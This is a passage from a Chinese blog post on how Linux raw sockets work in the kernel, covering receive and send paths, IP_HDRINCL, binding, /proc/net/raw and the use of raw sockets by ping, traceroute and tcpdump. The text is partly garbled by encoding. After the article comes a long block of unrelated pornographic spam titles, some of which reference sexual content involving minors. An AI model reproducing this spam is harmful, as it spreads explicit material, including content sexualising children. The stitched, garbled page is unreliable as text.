? ? ? ?上面介紹了報(bào)文接收在軟中斷的處理流程,下面介紹用戶態(tài)進(jìn)程讀取報(bào)文是如何實(shí)現(xiàn)的。用戶態(tài)的recvmsg()最終會(huì)調(diào)用raw_recvmsg(),后者再調(diào)用skb_recv_datagram。如果套接字接收隊(duì)列sk->sk_receive_queue中有報(bào)文就取skb并返回。否則調(diào)用wait_for_packet()等待,直到內(nèi)核軟中斷收到報(bào)文并喚醒用戶態(tài)進(jìn)程。


sys_recvmsg()->sock_recvmsg()->…->sock_common_recvmsg()->raw_recvmsg()


2.3.3 ?報(bào)文發(fā)送


用戶態(tài)調(diào)用sendto()或sendmsg()發(fā)送報(bào)文的內(nèi)核態(tài)處理流程如下,最終由raw_sendmsg()進(jìn)行發(fā)送。


sys_sendto()->sock_sendmsg()->__sock_sendmsg()->inet_sendmsg()->raw_sendmsg()


? ? 此函數(shù)先進(jìn)行一些參數(shù)合法性檢測,然后調(diào)用ip_route_output_slow()進(jìn)行選路。選路成功后主要執(zhí)行如下代碼片段,根據(jù)inet->hdrincl是否設(shè)置走不同的流程。raw_send_hdrinc()函數(shù)表示用戶態(tài)發(fā)送的數(shù)據(jù)中需要包含IP首部,即由調(diào)用者在發(fā)送時(shí)自行構(gòu)造IP首部。如果inet->hdrincl未置位,表示內(nèi)核會(huì)構(gòu)造IP首部,即調(diào)用者發(fā)送的數(shù)據(jù)中不包含IP首部。不管走哪個(gè)流程,最終都會(huì)經(jīng)過ip_output()->ip_finish_output()->…->dev_queue_xmit()將報(bào)文交給網(wǎng)卡驅(qū)動(dòng)的發(fā)送函數(shù)發(fā)送出去。


……?
if (inet->hdrincl) { //調(diào)用者要構(gòu)造IP首部?
? ? ? ? err = raw_send_hdrinc(sk, msg->msg_iov, len,?
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? rt, msg->msg_flags);?
} else {?
? ? ? ? …… //由內(nèi)核構(gòu)造IP首部?
? ? ? ?err = ip_push_pending_frames(sk);?
}?
……
? ?注:inet->hdrincl置位表示用戶態(tài)發(fā)送的數(shù)據(jù)中要包含IP首部,inet->hdrincl在以下兩種情況下被置位。


? ? a). 給套接字設(shè)置IP_HDRINCL選項(xiàng)


? ? ? ? ? setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, &val, sizeof(val))


? ? b). 調(diào)用socket()創(chuàng)建套接字時(shí),第三個(gè)參數(shù)指定為IPPROTO_RAW,見2.3.1節(jié)。


? ? ? ? ? socktet(PF_INET, SOCK_RAW, IPPROTO_RAW)


2.3.4 ?其它


a) ? ? ? 套接字綁定


若原始套接字調(diào)用bind()綁定了一個(gè)地址,則該套接口只能收到目的IP地址與綁定地址相匹配的報(bào)文。內(nèi)核的具體實(shí)現(xiàn)是raw_bind(),將inet->rcv_saddr設(shè)置為綁定地址。在原始套接字接收時(shí),__raw_v4_lookup()在設(shè)置了inet->rcv_saddr字段的情況下,會(huì)判斷該字段是否與報(bào)文目的IP地址相同。


sys_bind()->inet_bind()->raw_bind()


b) ? ? ?信息查看


網(wǎng)絡(luò)層原始套接字的信息可通過/proc/net/raw進(jìn)行查看。如下為圖5所創(chuàng)建的3個(gè)網(wǎng)絡(luò)層原始套接字的信息,可以查看到創(chuàng)建套接字時(shí)指定的協(xié)議類型、綁定的地址、發(fā)送和接收隊(duì)列已使用的緩存大小等信息。這些信息對于分析和定位問題有幫助。


cat /proc/net/raw
sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
1: 00000000:0001 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 1323 2 ffff8100070b2380
6: 00000000:0006 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 1322 2 ffff8100070b2080
89: 00000000:0059 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 1324 2 ffff8100070b2680
?
?三、應(yīng)用及注意事項(xiàng)


3.1 ?使用鏈路層原始套接字
?
注意事項(xiàng):
?
a) ? ? ? 盡量避免創(chuàng)建過多原始套接字,且原始套接字要盡量綁定網(wǎng)卡。因?yàn)槭盏矫總€(gè)報(bào)文除了會(huì)將其分發(fā)給綁定在該網(wǎng)卡上的原始套接字外,還會(huì)分發(fā)給沒有綁定網(wǎng)卡的原始套接字。如果原始套接字較多,一個(gè)報(bào)文就會(huì)在軟中斷上下文中分發(fā)多次,造成處理時(shí)間過長。
b) ? ? ?發(fā)包和收包盡量使用同一個(gè)原始套接字。如果發(fā)包與收包使用兩個(gè)不同的原始套接字,會(huì)由于接收報(bào)文時(shí)分發(fā)多次而影響性能。而且用于發(fā)送的那個(gè)套接字的接收隊(duì)列上也會(huì)緩存報(bào)文,直至達(dá)到接收隊(duì)列大小限制,會(huì)造成內(nèi)存泄露。
c) ? ? ? 若只接收指定類型二層報(bào)文,在調(diào)用socket()時(shí)指定第三個(gè)參數(shù)的協(xié)議類型,而最好不要使用ETH_P_ALL。因?yàn)镋TH_P_ALL會(huì)接收所有類型的報(bào)文,而且還會(huì)將外發(fā)報(bào)文收回來,這樣就需要做BPF過濾,比較影響性能。


3.2 ?使用網(wǎng)絡(luò)層原始套接字


注意事項(xiàng):


a) ? ? ? 由于IP報(bào)文的重組是在網(wǎng)絡(luò)層原始套接字接收流程之前執(zhí)行的,所以該原始套接字不能接收到UDP和TCP的分組數(shù)據(jù)。
b) ? ? ?若原始套接字已由bind()綁定了某個(gè)本地IP地址,那么只有目的IP地址與綁定地址匹配的報(bào)文,才能遞送到這個(gè)套接口上。
c) ? ? ? 若原始套接字已由connect()指定了某個(gè)遠(yuǎn)地IP地址,那么只有源IP地址與這個(gè)已連接地址匹配的報(bào)文,才能遞送到這個(gè)套接口上。


3.3 ?網(wǎng)絡(luò)診斷工具使用原始套接字


很多網(wǎng)絡(luò)診斷工具也是利用原始套接字來實(shí)現(xiàn)的,經(jīng)常會(huì)使用到的有tcpdump, ping和traceroute等。
tcpdump
該工具用于截獲網(wǎng)口上的報(bào)文流量。其實(shí)現(xiàn)原理是創(chuàng)建ETH_P_ALL類型的鏈路層原始套接字,讀取和解析報(bào)文數(shù)據(jù)并將信息顯示出來。
ping
該工具用于檢查網(wǎng)絡(luò)連接。其實(shí)現(xiàn)原理是創(chuàng)建網(wǎng)絡(luò)層原始套接字,指定協(xié)議類型為IPPROTO_ICMP。檢測方構(gòu)造ICMP回射請求報(bào)文(類型為ICMP_ECHO),根據(jù)ICMP協(xié)議實(shí)現(xiàn),被檢測方收到該請求報(bào)文后會(huì)響應(yīng)一個(gè)ICMP回射應(yīng)答報(bào)文(類型為ICMP_ECHOREPLY)。然后檢測方通過原始套接字讀取并解析應(yīng)答報(bào)文,并顯示出序號、TTL等信息。
traceroute
該工具用于跟蹤IP報(bào)文在網(wǎng)絡(luò)中的路由過程。其實(shí)現(xiàn)原理也是創(chuàng)建網(wǎng)絡(luò)層原始套接字,指定協(xié)議類型為IPPROTO_ICMP。假設(shè)從A主機(jī)路由到D主機(jī),需要依次經(jīng)過B主機(jī)和C主機(jī)。使用traceroute來跟蹤A主機(jī)到D主機(jī)的路由途徑,具體步驟如下,在每次探測過程中會(huì)顯示各節(jié)點(diǎn)的IP、時(shí)間等信息。


a) ? ? ? A主機(jī)使用普通的UDP套接字向目的主機(jī)發(fā)送TTL為1(使用套接口選項(xiàng)IP_TTL來修改)的UDP報(bào)文;
b) ? ? ?B主機(jī)收到該UDP報(bào)文后,由于TTL為1會(huì)拒絕轉(zhuǎn)發(fā),并且向A主機(jī)發(fā)送code為ICMP_EXC_TTL的ICMP報(bào)文;
c) ? ? ? A主機(jī)用創(chuàng)建的網(wǎng)絡(luò)層原始套接字讀取并解析ICMP報(bào)文。如果ICMP報(bào)文code是ICMP_EXC_TTL,就將UDP報(bào)文的TTL增加1并回到步驟a)繼續(xù)進(jìn)行探測;如果ICMP報(bào)文的code是ICMP_PROT_UNREACH,表示UDP報(bào)文到達(dá)了目的地。


? ? ? ? ? ? ? A主機(jī)―>B主機(jī)―>C主機(jī)―>D主機(jī)


參考資料
《Linux內(nèi)核源碼剖析——TCP/IP實(shí)現(xiàn)》
《深入理解Linux網(wǎng)絡(luò)內(nèi)幕》
《UNIX網(wǎng)絡(luò)編程 第1卷:套接口API》
========

總結(jié)

以上是生活随笔為你收集整理的Linux原始套接字学习总结的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

成人一在线视频日韩国产 | 高清国产亚洲精品自在久久 | 午夜精品久久久久久久 | 国产网红无码精品视频 | 一本一道久久综合久久 | 免费国产成人高清在线观看网站 | aa片在线观看视频在线播放 | 久久伊人色av天堂九九小黄鸭 | 色 综合 欧美 亚洲 国产 | 老头边吃奶边弄进去呻吟 | 欧美怡红院免费全部视频 | 奇米综合四色77777久久 东京无码熟妇人妻av在线网址 | 国产极品美女高潮无套在线观看 | 熟女俱乐部五十路六十路av | 久久国产36精品色熟妇 | 国产suv精品一区二区五 | 亚洲精品国产精品乱码视色 | www一区二区www免费 | 最近的中文字幕在线看视频 | 少妇高潮喷潮久久久影院 | 欧美老妇与禽交 | 亚洲区小说区激情区图片区 | 俄罗斯老熟妇色xxxx | 中文无码精品a∨在线观看不卡 | 成人欧美一区二区三区黑人 | 久久精品国产精品国产精品污 | 性色欲情网站iwww九文堂 | 丰满护士巨好爽好大乳 | 亚洲国产日韩a在线播放 | 亚洲一区二区三区四区 | 色婷婷综合激情综在线播放 | 久久久精品欧美一区二区免费 | 免费人成在线观看网站 | 天堂在线观看www | 亚洲色www成人永久网址 | 亚洲色偷偷偷综合网 | 欧美变态另类xxxx | 亚洲国产日韩a在线播放 | 国产欧美精品一区二区三区 | 亚洲色欲久久久综合网东京热 | 欧美喷潮久久久xxxxx | 九九在线中文字幕无码 | 色狠狠av一区二区三区 | 亚洲欧美综合区丁香五月小说 | 7777奇米四色成人眼影 | 亚洲色www成人永久网址 | 精品久久8x国产免费观看 | 国产97色在线 | 免 | 精品国产成人一区二区三区 | 欧美国产亚洲日韩在线二区 | 久久久av男人的天堂 | 最新国产麻豆aⅴ精品无码 | 国产精品福利视频导航 | 亚洲色无码一区二区三区 | 国产色精品久久人妻 | 国产成人精品必看 | 性欧美videos高清精品 | 国产午夜视频在线观看 | 啦啦啦www在线观看免费视频 | 无码精品国产va在线观看dvd | 国产一区二区三区四区五区加勒比 | 国产无套粉嫩白浆在线 | 亚洲欧美日韩成人高清在线一区 | 久久国产精品萌白酱免费 | 亚洲欧美日韩国产精品一区二区 | 澳门永久av免费网站 | 十八禁真人啪啪免费网站 | 国产精品无码一区二区三区不卡 | 天堂无码人妻精品一区二区三区 | 大肉大捧一进一出好爽视频 | 国产色在线 | 国产 | 乱人伦中文视频在线观看 | 蜜桃av抽搐高潮一区二区 | 久久亚洲精品中文字幕无男同 | 成人免费视频视频在线观看 免费 | 伊人久久婷婷五月综合97色 | 丰满少妇人妻久久久久久 | 伊人色综合久久天天小片 | 中文字幕av日韩精品一区二区 | 丰腴饱满的极品熟妇 | 国产精品第一区揄拍无码 | 亚洲s色大片在线观看 | 久久久精品欧美一区二区免费 | 久久亚洲精品成人无码 | 最新版天堂资源中文官网 | 精品国产av色一区二区深夜久久 | 中文字幕无线码 | 精品人妻中文字幕有码在线 | 国产一区二区三区影院 | 亚洲中文字幕无码中字 | 久久人人爽人人爽人人片av高清 | 亚洲日韩中文字幕在线播放 | 亚洲精品国产品国语在线观看 | 东京热一精品无码av | 领导边摸边吃奶边做爽在线观看 | 色一情一乱一伦一视频免费看 | 亚洲成熟女人毛毛耸耸多 | 黑人巨大精品欧美黑寡妇 | 丰满人妻精品国产99aⅴ | 国产午夜福利亚洲第一 | 色综合久久网 | 一本色道久久综合亚洲精品不卡 | 高潮毛片无遮挡高清免费 | 丰满少妇高潮惨叫视频 | 国产成人精品久久亚洲高清不卡 | 精品一区二区三区无码免费视频 | 性欧美疯狂xxxxbbbb | www成人国产高清内射 | 亚洲精品久久久久久久久久久 | 亚洲国产精品成人久久蜜臀 | 欧美丰满老熟妇xxxxx性 | 国产精品对白交换视频 | 国产情侣作爱视频免费观看 | 麻豆蜜桃av蜜臀av色欲av | 无码帝国www无码专区色综合 | 蜜桃无码一区二区三区 | 天堂无码人妻精品一区二区三区 | 国产偷抇久久精品a片69 | www成人国产高清内射 | 无码人妻黑人中文字幕 | 欧美丰满熟妇xxxx性ppx人交 | 亚洲一区二区三区 | 欧美日韩久久久精品a片 | 夜夜夜高潮夜夜爽夜夜爰爰 | 强辱丰满人妻hd中文字幕 | 久久国产精品偷任你爽任你 | 久久久久成人精品免费播放动漫 | 少妇人妻偷人精品无码视频 | 日本爽爽爽爽爽爽在线观看免 | 亚洲乱码中文字幕在线 | 好屌草这里只有精品 | 国产精品久久久一区二区三区 | 人人爽人人澡人人高潮 | 欧美阿v高清资源不卡在线播放 | 伊人久久大香线焦av综合影院 | 亚洲中文字幕在线观看 | 蜜桃视频韩日免费播放 | 国产一区二区三区影院 | 麻豆av传媒蜜桃天美传媒 | 久久亚洲a片com人成 | 老子影院午夜精品无码 | 国产三级久久久精品麻豆三级 | 国精产品一区二区三区 | 国产情侣作爱视频免费观看 | 伊人久久大香线蕉午夜 | 国产午夜亚洲精品不卡下载 | 欧美三级a做爰在线观看 | 精品厕所偷拍各类美女tp嘘嘘 | 波多野结衣乳巨码无在线观看 | 欧美精品无码一区二区三区 | 欧洲熟妇色 欧美 | 岛国片人妻三上悠亚 | 人妻少妇被猛烈进入中文字幕 | 成人毛片一区二区 | 国产婷婷色一区二区三区在线 | 好爽又高潮了毛片免费下载 | 欧美三级a做爰在线观看 | 国产极品美女高潮无套在线观看 | 免费观看激色视频网站 | 中文字幕日产无线码一区 | 久久亚洲日韩精品一区二区三区 | 欧美熟妇另类久久久久久不卡 | 人妻少妇精品无码专区动漫 | 国产精品久久久久无码av色戒 | 麻豆果冻传媒2021精品传媒一区下载 | 色婷婷av一区二区三区之红樱桃 | 日本大香伊一区二区三区 | 国产精品.xx视频.xxtv | 纯爱无遮挡h肉动漫在线播放 | 国内精品一区二区三区不卡 | 精品偷拍一区二区三区在线看 | 国产超碰人人爽人人做人人添 | 波多野结衣av在线观看 | 国产精品人妻一区二区三区四 | 内射后入在线观看一区 | 亚洲熟悉妇女xxx妇女av | 国产亚洲日韩欧美另类第八页 | 中文久久乱码一区二区 | 欧美丰满熟妇xxxx性ppx人交 | 久久精品国产精品国产精品污 | 国产成人综合在线女婷五月99播放 | 国产精品久免费的黄网站 | 无遮挡啪啪摇乳动态图 | 日韩欧美中文字幕在线三区 | 玩弄少妇高潮ⅹxxxyw | 两性色午夜免费视频 | 中文字幕无码日韩欧毛 | 国产一区二区三区精品视频 | 亚洲国产精华液网站w | 国产精品人人妻人人爽 | 天堂一区人妻无码 | 大地资源中文第3页 | 97久久国产亚洲精品超碰热 | 疯狂三人交性欧美 | 国产精品久久久久9999小说 | 亚洲人亚洲人成电影网站色 | 999久久久国产精品消防器材 | 国产精品国产三级国产专播 | 九九久久精品国产免费看小说 | 牛和人交xxxx欧美 | 亚洲精品综合一区二区三区在线 | 久久97精品久久久久久久不卡 | 日韩精品一区二区av在线 | 国产成人精品久久亚洲高清不卡 | 桃花色综合影院 | 麻豆精品国产精华精华液好用吗 | а√资源新版在线天堂 | 麻豆国产丝袜白领秘书在线观看 | 亚洲精品www久久久 | 久久人人爽人人爽人人片ⅴ | 欧美国产日韩亚洲中文 | 亚洲一区二区三区含羞草 | 亚洲国产av精品一区二区蜜芽 | 国产精品久久久久久亚洲毛片 | 久久久精品人妻久久影视 | 中文字幕人妻丝袜二区 | 亚洲色无码一区二区三区 | 少妇一晚三次一区二区三区 | 高清无码午夜福利视频 | 波多野结衣av一区二区全免费观看 | 一本久道久久综合婷婷五月 | 日韩精品无码一本二本三本色 | 精品无码av一区二区三区 | 色窝窝无码一区二区三区色欲 | 国产suv精品一区二区五 | 亚洲国产av精品一区二区蜜芽 | 久久zyz资源站无码中文动漫 | 亚洲国精产品一二二线 | 日韩精品一区二区av在线 | 美女毛片一区二区三区四区 | 红桃av一区二区三区在线无码av | 男人的天堂2018无码 | 无码中文字幕色专区 | 在线观看欧美一区二区三区 | 日本xxxx色视频在线观看免费 | 国产精品久久久久影院嫩草 | 成人一区二区免费视频 | 欧美高清在线精品一区 | 日韩少妇内射免费播放 | 欧美高清在线精品一区 | 亚洲精品午夜国产va久久成人 | 久久99精品久久久久久动态图 | 精品无码一区二区三区的天堂 | 亚洲精品一区二区三区四区五区 | 真人与拘做受免费视频一 | 久久久国产精品无码免费专区 | 色婷婷av一区二区三区之红樱桃 | 无码免费一区二区三区 | 亚洲伊人久久精品影院 | 红桃av一区二区三区在线无码av | 欧美性黑人极品hd | 撕开奶罩揉吮奶头视频 | 性做久久久久久久久 | 天天摸天天碰天天添 | 国产乱人偷精品人妻a片 | 性生交片免费无码看人 | 人妻人人添人妻人人爱 | 久久国产精品偷任你爽任你 | 97久久超碰中文字幕 | 中文字幕亚洲情99在线 | 亚洲色偷偷偷综合网 | 国产偷自视频区视频 | 久久人人97超碰a片精品 | 妺妺窝人体色www在线小说 | 无码人妻丰满熟妇区毛片18 | 免费视频欧美无人区码 | 国产亚洲精品久久久久久大师 | 国内揄拍国内精品人妻 | 国产精品无码mv在线观看 | 国产成人一区二区三区在线观看 | 未满小14洗澡无码视频网站 | 成人试看120秒体验区 | 欧美野外疯狂做受xxxx高潮 | 欧美性黑人极品hd | 天天做天天爱天天爽综合网 | 强辱丰满人妻hd中文字幕 | 97精品国产97久久久久久免费 | 久久精品中文闷骚内射 | 老子影院午夜精品无码 | 国产亚洲精品久久久久久久 | 亚洲 高清 成人 动漫 | 亚洲s码欧洲m码国产av | 久久精品国产日本波多野结衣 | 又粗又大又硬又长又爽 | 国产精品无码成人午夜电影 | 学生妹亚洲一区二区 | 欧美成人高清在线播放 | 国产亚洲精品久久久久久 | 999久久久国产精品消防器材 | 99国产欧美久久久精品 | 亚洲综合无码久久精品综合 | 精品一区二区三区波多野结衣 | 内射后入在线观看一区 | 免费视频欧美无人区码 | 香港三级日本三级妇三级 | a在线观看免费网站大全 | 亚洲 激情 小说 另类 欧美 | 午夜福利一区二区三区在线观看 | 久久久久久久人妻无码中文字幕爆 | 免费无码肉片在线观看 | 欧美性生交xxxxx久久久 | 国产乱子伦视频在线播放 | 亚洲综合另类小说色区 | 亚洲色欲久久久综合网东京热 | 国产莉萝无码av在线播放 | www国产亚洲精品久久久日本 | 亚洲 高清 成人 动漫 | 国产在线aaa片一区二区99 | 精品无人国产偷自产在线 | 久久婷婷五月综合色国产香蕉 | 欧美性黑人极品hd | 国精品人妻无码一区二区三区蜜柚 | 久久精品99久久香蕉国产色戒 | 亚洲日本va午夜在线电影 | 精品人人妻人人澡人人爽人人 | 99er热精品视频 | 亚洲色在线无码国产精品不卡 | 又黄又爽又色的视频 | 亚洲天堂2017无码中文 | 国产亚洲欧美日韩亚洲中文色 | 久久精品中文闷骚内射 | 中文字幕无码热在线视频 | 国产精品久久国产三级国 | 国产亚洲美女精品久久久2020 | 又大又硬又黄的免费视频 | 亚洲乱码日产精品bd | 高清国产亚洲精品自在久久 | 亚洲精品一区二区三区在线观看 | 男女作爱免费网站 | 色情久久久av熟女人妻网站 | 精品一区二区不卡无码av | 宝宝好涨水快流出来免费视频 | 7777奇米四色成人眼影 | 国产69精品久久久久app下载 | 亚洲成a人一区二区三区 | 亚洲精品美女久久久久久久 | 荫蒂被男人添的好舒服爽免费视频 | 国产在线无码精品电影网 | 在线看片无码永久免费视频 | 狠狠cao日日穞夜夜穞av | 日本乱人伦片中文三区 | 国产av久久久久精东av | 亚洲精品一区二区三区在线观看 | 国产精品福利视频导航 | 久久99精品国产麻豆蜜芽 | 精品熟女少妇av免费观看 | 熟女少妇在线视频播放 | 成人av无码一区二区三区 | 97色伦图片97综合影院 | 老熟女乱子伦 | 国产无遮挡又黄又爽免费视频 | 成人精品视频一区二区三区尤物 | 人妻体内射精一区二区三四 | 动漫av网站免费观看 | 亚洲第一网站男人都懂 | 国产午夜精品一区二区三区嫩草 | 无码人妻久久一区二区三区不卡 | 2019nv天堂香蕉在线观看 | 99久久亚洲精品无码毛片 | 无码纯肉视频在线观看 | 女人被男人躁得好爽免费视频 | 久久综合香蕉国产蜜臀av | 丰满少妇人妻久久久久久 | 高清无码午夜福利视频 | 麻豆国产人妻欲求不满 | 国产精品久免费的黄网站 | 欧美激情内射喷水高潮 | 国产午夜亚洲精品不卡 | aa片在线观看视频在线播放 | 帮老师解开蕾丝奶罩吸乳网站 | 麻豆人妻少妇精品无码专区 | 日日干夜夜干 | 日日摸日日碰夜夜爽av | 亚洲天堂2017无码中文 | 男人的天堂2018无码 | 国产精品香蕉在线观看 | 国产成人无码专区 | 波多野结衣乳巨码无在线观看 | 国产精品亚洲lv粉色 | 99久久久无码国产精品免费 | 国产成人午夜福利在线播放 | 最新版天堂资源中文官网 | 精品熟女少妇av免费观看 | 巨爆乳无码视频在线观看 | 日韩精品a片一区二区三区妖精 | 无码精品国产va在线观看dvd | 精品国偷自产在线 | 精品国产一区二区三区四区 | 男女爱爱好爽视频免费看 | 国産精品久久久久久久 | 国产激情无码一区二区app | √天堂资源地址中文在线 | 国产精品a成v人在线播放 | 国产亚洲欧美日韩亚洲中文色 | 免费人成网站视频在线观看 | 无码av中文字幕免费放 | 国产精品无码一区二区桃花视频 | 精品人人妻人人澡人人爽人人 | 亚洲日韩乱码中文无码蜜桃臀网站 | 免费无码的av片在线观看 | 中文字幕无线码 | 久久精品女人的天堂av | 2020久久香蕉国产线看观看 | av无码不卡在线观看免费 | 日本精品少妇一区二区三区 | 国产亚洲人成a在线v网站 | 久久精品国产99久久6动漫 | 中文字幕精品av一区二区五区 | 色诱久久久久综合网ywww | 欧美国产日韩久久mv | 四虎国产精品免费久久 | 免费观看又污又黄的网站 | 人人超人人超碰超国产 | 亚洲中文无码av永久不收费 | 蜜臀aⅴ国产精品久久久国产老师 | 国产精品理论片在线观看 | 成年女人永久免费看片 | 亚洲国产av美女网站 | 国产精品a成v人在线播放 | 亚洲欧美色中文字幕在线 | 欧美日本精品一区二区三区 | 国产熟女一区二区三区四区五区 | 日本xxxx色视频在线观看免费 | 最近中文2019字幕第二页 | a在线观看免费网站大全 | 97se亚洲精品一区 | 国产女主播喷水视频在线观看 | 熟妇女人妻丰满少妇中文字幕 | 国产办公室秘书无码精品99 | 4hu四虎永久在线观看 | 永久黄网站色视频免费直播 | 日韩人妻少妇一区二区三区 | 久久久中文字幕日本无吗 | 国产精品va在线播放 | 无码人妻丰满熟妇区毛片18 | 成人精品视频一区二区三区尤物 | 99久久久无码国产精品免费 | 成人无码视频在线观看网站 | 色欲久久久天天天综合网精品 | 久久国产精品_国产精品 | 国産精品久久久久久久 | 蜜桃臀无码内射一区二区三区 | 久久久精品人妻久久影视 | 欧洲熟妇精品视频 | 大地资源网第二页免费观看 | 欧美人与禽zoz0性伦交 | 麻豆精品国产精华精华液好用吗 | 无遮无挡爽爽免费视频 | 丰满人妻翻云覆雨呻吟视频 | 精品亚洲韩国一区二区三区 | 日产精品高潮呻吟av久久 | 国产97在线 | 亚洲 | 色老头在线一区二区三区 | 久久综合狠狠综合久久综合88 | 天天av天天av天天透 | 亚洲国产精品毛片av不卡在线 | 亚洲精品国产第一综合99久久 | 麻豆精产国品 | 少妇愉情理伦片bd | 一本久久伊人热热精品中文字幕 | 76少妇精品导航 | 色婷婷综合激情综在线播放 | 男女性色大片免费网站 | 激情综合激情五月俺也去 | 性色欲网站人妻丰满中文久久不卡 | 免费国产黄网站在线观看 | 亚洲成av人片在线观看无码不卡 | 欧美阿v高清资源不卡在线播放 | 欧美丰满熟妇xxxx | 天堂久久天堂av色综合 | 成人精品一区二区三区中文字幕 | 人妻熟女一区 | 久久人人爽人人人人片 | 精品无码av一区二区三区 | 天天做天天爱天天爽综合网 | 成人片黄网站色大片免费观看 | 一区二区传媒有限公司 | 曰韩少妇内射免费播放 | 亚洲精品国产a久久久久久 | 97资源共享在线视频 | av无码久久久久不卡免费网站 | 欧美熟妇另类久久久久久多毛 | 久久无码中文字幕免费影院蜜桃 | 荫蒂添的好舒服视频囗交 | 中文字幕无码av激情不卡 | 国产精品亚洲а∨无码播放麻豆 | 无码中文字幕色专区 | 欧美日本免费一区二区三区 | 国产午夜福利100集发布 | 欧美变态另类xxxx | 国产亚洲精品久久久久久久 | 日韩亚洲欧美中文高清在线 | 在线观看国产一区二区三区 | 在线 国产 欧美 亚洲 天堂 | 天堂在线观看www | 男女猛烈xx00免费视频试看 | 亚洲s码欧洲m码国产av | 成年美女黄网站色大免费全看 | 国产亲子乱弄免费视频 | 成人av无码一区二区三区 | 亚洲精品鲁一鲁一区二区三区 | 亚洲中文字幕无码中文字在线 | 国产成人午夜福利在线播放 | 亚洲日本va午夜在线电影 | 狠狠色色综合网站 | 在线看片无码永久免费视频 | 成人片黄网站色大片免费观看 | 欧美三级不卡在线观看 | 日本丰满熟妇videos | 亚洲精品综合一区二区三区在线 | 最近的中文字幕在线看视频 | 欧美人与禽zoz0性伦交 | 夜夜躁日日躁狠狠久久av | 99久久亚洲精品无码毛片 | 无码人妻丰满熟妇区五十路百度 | 少妇高潮一区二区三区99 | 成在人线av无码免费 | 1000部啪啪未满十八勿入下载 | 99久久婷婷国产综合精品青草免费 | 内射老妇bbwx0c0ck | 亚洲一区二区三区播放 | 国产精品无码mv在线观看 | 理论片87福利理论电影 | 婷婷综合久久中文字幕蜜桃三电影 | 亚洲国产精品久久人人爱 | 欧美成人免费全部网站 | 男女性色大片免费网站 | 国内精品九九久久久精品 | 国产午夜视频在线观看 | а√资源新版在线天堂 | 无码人妻出轨黑人中文字幕 | 国产午夜视频在线观看 | 老熟女乱子伦 | 欧美亚洲日韩国产人成在线播放 | 熟女体下毛毛黑森林 | 少妇高潮一区二区三区99 | 日本成熟视频免费视频 | √8天堂资源地址中文在线 | 老头边吃奶边弄进去呻吟 | 日产精品高潮呻吟av久久 | 无码人妻黑人中文字幕 | 国产人妻精品午夜福利免费 | 粉嫩少妇内射浓精videos | 无码人妻少妇伦在线电影 | 亚洲欧美国产精品久久 | 亚洲国产综合无码一区 | 国产精品第一国产精品 | 国产精品视频免费播放 | 久久久婷婷五月亚洲97号色 | 97精品人妻一区二区三区香蕉 | 国产亚洲精品久久久久久 | 天天躁日日躁狠狠躁免费麻豆 | 精品日本一区二区三区在线观看 | 少妇人妻大乳在线视频 | 久久久久国色av免费观看性色 | 国产激情一区二区三区 | 无码人妻出轨黑人中文字幕 | 性啪啪chinese东北女人 | 久久久精品成人免费观看 | 亚洲色无码一区二区三区 | 亚洲一区二区三区在线观看网站 | 波多野结衣av在线观看 | a在线亚洲男人的天堂 | 久久亚洲日韩精品一区二区三区 | 国产免费观看黄av片 | 天堂无码人妻精品一区二区三区 | 中文字幕人妻无码一夲道 | 精品一区二区不卡无码av | 久久99精品国产.久久久久 | 久久综合久久自在自线精品自 | 日日躁夜夜躁狠狠躁 | 国产莉萝无码av在线播放 | 国产乱子伦视频在线播放 | аⅴ资源天堂资源库在线 | 亚洲乱码国产乱码精品精 | 亚洲国产精品成人久久蜜臀 | 国产人妻人伦精品1国产丝袜 | 丰满人妻精品国产99aⅴ | 一个人看的视频www在线 | 亚洲另类伦春色综合小说 | 丰满少妇弄高潮了www | 内射后入在线观看一区 | 国产麻豆精品精东影业av网站 | 亚洲日韩av一区二区三区中文 | 色一情一乱一伦一视频免费看 | 狠狠cao日日穞夜夜穞av | 国产精品第一国产精品 | 呦交小u女精品视频 | 天天躁夜夜躁狠狠是什么心态 | 国产精品久久久久无码av色戒 | 强伦人妻一区二区三区视频18 | 中文精品无码中文字幕无码专区 | 天天拍夜夜添久久精品大 | 久久精品中文字幕大胸 | 国产精品igao视频网 | 蜜桃臀无码内射一区二区三区 | 国产人妻久久精品二区三区老狼 | 成年女人永久免费看片 | 亚洲国产精品成人久久蜜臀 | 激情爆乳一区二区三区 | 色五月丁香五月综合五月 | 国产av一区二区精品久久凹凸 | 日韩精品a片一区二区三区妖精 | 亚洲中文字幕在线无码一区二区 | 亚洲精品午夜无码电影网 | 久久人人爽人人爽人人片ⅴ | 欧美阿v高清资源不卡在线播放 | 亚洲人成影院在线观看 | 最近免费中文字幕中文高清百度 | 四虎国产精品一区二区 | 狠狠色噜噜狠狠狠狠7777米奇 | 性生交大片免费看女人按摩摩 | 美女扒开屁股让男人桶 | 亚洲日韩av一区二区三区中文 | 国产内射老熟女aaaa | 国语自产偷拍精品视频偷 | 欧美午夜特黄aaaaaa片 | 国产偷国产偷精品高清尤物 | 国产乱人无码伦av在线a | 日韩少妇白浆无码系列 | 无码帝国www无码专区色综合 | 欧美一区二区三区视频在线观看 | 嫩b人妻精品一区二区三区 | 精品无码av一区二区三区 | 国产亚洲精品久久久久久久久动漫 | 男女超爽视频免费播放 | 男人的天堂2018无码 | 国产av一区二区精品久久凹凸 | 丁香花在线影院观看在线播放 | 日本一卡2卡3卡4卡无卡免费网站 国产一区二区三区影院 | 国产精品a成v人在线播放 | 国产人妖乱国产精品人妖 | 国产精品香蕉在线观看 | 99久久精品午夜一区二区 | 亚洲一区二区三区国产精华液 | 荫蒂被男人添的好舒服爽免费视频 | 久久久久免费精品国产 | 精品无码一区二区三区的天堂 | 台湾无码一区二区 | 中文字幕无码人妻少妇免费 | 日韩欧美群交p片內射中文 | 午夜理论片yy44880影院 | 亚洲性无码av中文字幕 | 真人与拘做受免费视频一 | 老司机亚洲精品影院 | 国产做国产爱免费视频 | 中文字幕无码日韩欧毛 | 国精产品一区二区三区 | 欧美精品在线观看 | 亚洲精品一区二区三区大桥未久 | 精品午夜福利在线观看 | 欧美成人高清在线播放 | 